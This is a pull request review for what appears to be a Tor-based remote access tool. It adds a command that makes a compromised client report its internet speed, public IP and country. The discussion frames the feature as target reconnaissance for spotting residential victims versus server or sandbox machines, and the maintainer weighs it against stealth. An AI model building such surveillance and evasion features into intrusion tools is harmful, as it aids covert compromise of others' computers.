### PR TITLE
Adds the ability to speedtest clients internet connection

### PR DESCRIPTION
**Pull request by JustinTimperio**
#197

### CODE REVIEW

File: torat_server/client_ishell.go [hunk 1]
```diff
@@ -87,6 +87,11 @@ func (client activeClient) shellClient() {
 			},
 			Help: "background the current session",
 		},
+		{
+			Name: "speedtest",
+			Func: client.Speedtest,
+			Help: "tell the client to reconnect",
```
Comment (lu4p) [inline torat_server/client_ishell.go:93]: Add a fitting description/ help

File: Dockerfile [hunk 2]
```diff
@@ -8,6 +8,8 @@ COPY go.sum .
 RUN go mod download -x
 RUN GO111MODULE=on go install github.com/lu4p/binclude/cmd/binclude
 
+RUN GO111MODULE=on go get github.com/showwin/speedtest-go
```
Comment (lu4p) [inline Dockerfile:11]: This is unnessecary, go mod download already installs this.

File: torat_server/client_ishell.go [hunk 3]
```diff
@@ -257,10 +262,25 @@ func (client *activeClient) Shred(c *ishell.Context) {
...
-func (client *activeClient) Ping(c *ishell.Context) error {
-	return client.RPC.Call("API.Ping", void, &void)
+// Speedtest
+func (client *activeClient) Speedtest(c *ishell.Context) {
+	c.ProgressBar().Indeterminate(true)
+	c.ProgressBar().Start()
+
+	r := shared.Speedtest{}
+	if err := client.RPC.Call("API.Speedtest", void, &r); err != nil {
+		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Could not perform speedtest on client!"))
```
Comment (lu4p) [inline torat_server/client_ishell.go:272]: Also print the actual err for added context.

File: torat_client/rpcapi.go [hunk 4]
```diff
@@ -74,9 +75,22 @@ func (a *API) LS(v shared.Void, r *shared.Dir) (err error) {
 	return
 }
 
-func (a *API) Ping(v shared.Void, r *string) error {
-	// TODO implement
-	*r = "Pong"
+func (a *API) Speedtest(v shared.Void, r *shared.Speedtest) error {
+	user, _ := speedtest.FetchUserInfo()
```
Comment (lu4p) [inline torat_client/rpcapi.go:79]: Whats the other return value?
If its an error don't ignore it.

**Review by lu4p — CHANGES_REQUESTED** [review]
I'm not quite sure if this is really useful, as we don't really care about the internet link speed (tor).
Also adding speedtest.net might not be good for stealth/ privacy.

What would be useful is to test the current link speed between client and server instead.

Or what is your usecase here?

File: Dockerfile (hunk 2 above)
Comment (JustinTimperio) [reply Dockerfile:11]: Did not know that. Thanks

File: torat_server/client_ishell.go (hunk 1 above)
Comment (JustinTimperio) [reply torat_server/client_ishell.go:93]: whoops missed this

File: torat_client/rpcapi.go (hunk 4 above)
Comment (JustinTimperio) [reply torat_client/rpcapi.go:87]: I'm not sure what the other value returned is but that's how the official docs say to call it.
https://github.com/showwin/speedtest-go#api-usage

**Comment by JustinTimperio** [comment]
@lu4p So the use case here is to check the native internet connection speed. This isn't checking the speed of the tor connection. 

This is useful in a couple of ways. For one this a great piece of info to know when to extracting information about a target system. Second, it also collects the public ip, and country. In combo, they can help identify if a client is say, a residential home connection or a virtual machine in a server farm with a fast symmetrical link.

File: torat_server/client_ishell.go (hunk 3 above)
Comment (JustinTimperio) [reply torat_server/client_ishell.go:272]: Okay

**Comment by JustinTimperio** [comment]
I'm going to update this and resubmit since the versioning has got a tad messy for me with multiple bug fixes at once

**Pull request closed without merging**